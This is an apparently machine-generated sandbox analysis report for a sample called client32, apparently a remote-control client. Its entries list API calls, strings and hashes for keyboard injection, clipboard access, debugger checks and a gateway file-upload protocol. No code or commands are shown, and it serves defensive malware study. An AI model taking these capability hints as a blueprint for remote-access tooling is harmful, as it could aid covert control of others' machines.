                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 2579439406-0
                                                                                                • Opcode ID: 71637a5c5caeeef083b589b2911ffc392d7328401cbbe8bbf0d4869b760c6276
                                                                                                • Instruction ID: 087f7bf10657bc984eb09ea6adfa9db826d5f5baa00963b10f21dc1fad18f3d6
                                                                                                • Opcode Fuzzy Hash: 71637a5c5caeeef083b589b2911ffc392d7328401cbbe8bbf0d4869b760c6276
                                                                                                • Instruction Fuzzy Hash: 6921ACB48102C4DFFB40DF29D649B483BB4BF0A354F50C17BEA1887A90E7B559818F59
                                                                                                Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsIconic.USER32(?), ref: 11113387
                                                                                                • GetTickCount.KERNEL32(?,11122D16,00000000,00000000), ref: 111133A1
                                                                                                Strings
                                                                                                • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                                • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountIconicTick
                                                                                                • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                                • API String ID: 1307367305-2838568823
                                                                                                • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                                • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                                • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                                • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                                                Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 110C10BD
                                                                                                • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                                                • GetCurrentThreadId.KERNEL32(00000000,00000000,00000000,?,1105E793,00000001,00000001,?,00000000), ref: 110C10E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$BringCurrentIconicShowThread
                                                                                                • String ID:
                                                                                                • API String ID: 4184413098-0
                                                                                                • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                                • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                                                • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                                • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                                                Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                                • keybd_event.USER32 ref: 11113215
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ControlDevicekeybd_event
                                                                                                • String ID:
                                                                                                • API String ID: 1421710848-0
                                                                                                • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                                                • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                                                Function 110335A0 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                                                • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$DataFormatName
                                                                                                • String ID:
                                                                                                • API String ID: 3172747766-0
                                                                                                • Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                                • Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
                                                                                                • Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                                • Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
                                                                                                Function 69D12151 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnumSystemLocalesA.KERNEL32(Function_00031DB6,00000001), ref: 69D12164
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumLocalesSystem
                                                                                                • String ID:
                                                                                                • API String ID: 2099609381-0
                                                                                                • Opcode ID: b14a0a44276163eecb65fbfe07a9b685811072da60b9c17010d338e8072ee422
                                                                                                • Instruction ID: 06f6e1a31f7c733cf75cd44a2f9c2b84712a34173a4d48a7f172fdaa1c708725
                                                                                                • Opcode Fuzzy Hash: b14a0a44276163eecb65fbfe07a9b685811072da60b9c17010d338e8072ee422
                                                                                                • Instruction Fuzzy Hash: F8D0C9B19587465AFB14CF24D608B61BAE0EB12B19F908A2CDB92818C0D67590888600
                                                                                                Function 69D13923 Relevance: .5, Instructions: 489COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 11e7a7edc6fbc64ca72bba83bc3657d99e157655005d14831afbbe2577e79610
                                                                                                • Instruction ID: 4defef459b5963789e4786d40c5e0954850fbc05b41f9846e4fee500e0e9835e
                                                                                                • Opcode Fuzzy Hash: 11e7a7edc6fbc64ca72bba83bc3657d99e157655005d14831afbbe2577e79610
                                                                                                • Instruction Fuzzy Hash: FD029433D4D6B28B8B714FB955D0267BEA06E02B5030F46F9DDD03F99AC212DD1A96E0
                                                                                                Function 69D14910 Relevance: .4, Instructions: 355COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                • Instruction ID: 84a3cdafa3974aa55d92910394bb0fa589639b47677dcc93fcdb43c7f1973452
                                                                                                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                • Instruction Fuzzy Hash: 6FC1A273D0F5B2858B35473E655822FEEA26E82B5531BC3B5DCE03FA8DC2226D0586D0
                                                                                                Function 69D14156 Relevance: .3, Instructions: 332COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                • Instruction ID: 6c5efa723180507fba55d0acf422070fff9a16337e10268bf2e63edb25700cb3
                                                                                                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                • Instruction Fuzzy Hash: EEC1C473D4F5B2858B36473D251826FEEA16E82B5531BC3B1DCE03FA8DC2226D4586D0
                                                                                                Function 69D13DB8 Relevance: .3, Instructions: 326COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                • Instruction ID: 77630eed1880554f08a81e9ba098914b3647a08af0c1d470e32f35382b18fcb9
                                                                                                • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                • Instruction Fuzzy Hash: 65B1A573D0E5B3858B25473E651822FEE726E82B4531BC3B5DCE03FA8DC622AD0585D0
                                                                                                Function 69CE1310 Relevance: .3, Instructions: 286COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9cd64dc5de210431f7f4314fe6c509be6f7c6deef7a1f989e222ebce1f15e448
                                                                                                • Instruction ID: 32a9178cd1bee4797ec904981b56cbfbcb0d10066372c48026e1d2a9d6bb37f3
                                                                                                • Opcode Fuzzy Hash: 9cd64dc5de210431f7f4314fe6c509be6f7c6deef7a1f989e222ebce1f15e448
                                                                                                • Instruction Fuzzy Hash: F9C11D76A50B139BD7198E68D8D07B1B391FF9C308F8A4638CF4667786D6397921CAC0
                                                                                                Function 69D043C0 Relevance: .1, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: a06d34022f88d1348e9cd50ecdf0becadca41b0bfe52224f3366da9e397d29de
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: 8B11E7B7640082C3D600CF6DD9B0EABA795FBE5329729837AD1614BE58F2A3F1559A00
                                                                                                Function 69D14DF5 Relevance: .1, Instructions: 65COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f17bd66ca498ffab784565415518fd43a0618959bb610f079ea05355ce8d3137
                                                                                                • Instruction ID: eecc460f0fc4220d1d2e96e1692f5b3c1b3742371597cb8e349a252ad92847e2
                                                                                                • Opcode Fuzzy Hash: f17bd66ca498ffab784565415518fd43a0618959bb610f079ea05355ce8d3137
                                                                                                • Instruction Fuzzy Hash: F611F272104E958BC31E9B11844B118B360EFA6A183B4569D9897DF2CECB239473DFD6
                                                                                                Function 69D138A3 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1c3bd6cb46bf8240d50efdfa66ac628336042c43f0bcfd8161288d853a1e5575
                                                                                                • Instruction ID: 6c7e449baa16b609e640e7a49cbc1d8f4a097c7658585760056147fc2be474bb
                                                                                                • Opcode Fuzzy Hash: 1c3bd6cb46bf8240d50efdfa66ac628336042c43f0bcfd8161288d853a1e5575
                                                                                                • Instruction Fuzzy Hash: 6B11CD33249B19DF9B0ECF24D19A155FB66FF42608B54917EC1128F5D9CB73A002CB09
                                                                                                Function 69CF48E0 Relevance: 59.8, APIs: 17, Strings: 17, Instructions: 327COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_fseek$__fsopen_free_memset
                                                                                                • String ID: CMD=PUTFILE$DATA=$FLEN=%d$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$MORE=%d$OFFSET=%d$ON=%s$PWD=%s$SUB=%s$ctl_putfile - _filelength FAILED (error: %d)$ctl_putfile - _topen FAILED (error: %d)$ctl_putfile - empty file (%s)$putfile - _read FAILED (error: %d)
                                                                                                • API String ID: 908761794-2149975586
                                                                                                • Opcode ID: 6afc5931d3094a8795824246beb5b59780cf68cb6f17642b266071231b7a84d8
                                                                                                • Instruction ID: c59c4fc07f4337fd3deb95c5a35dd41bc2f7eeff74e16ff20c808eb234847f03
                                                                                                • Opcode Fuzzy Hash: 6afc5931d3094a8795824246beb5b59780cf68cb6f17642b266071231b7a84d8
                                                                                                • Instruction Fuzzy Hash: B2B1D3B6C00218ABDB10DFF5DD88FDEB778AF45308F508169E609A7245FB315A468FA1
                                                                                                Function 1103D530 Relevance: 56.4, APIs: 14, Strings: 18, Instructions: 385libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
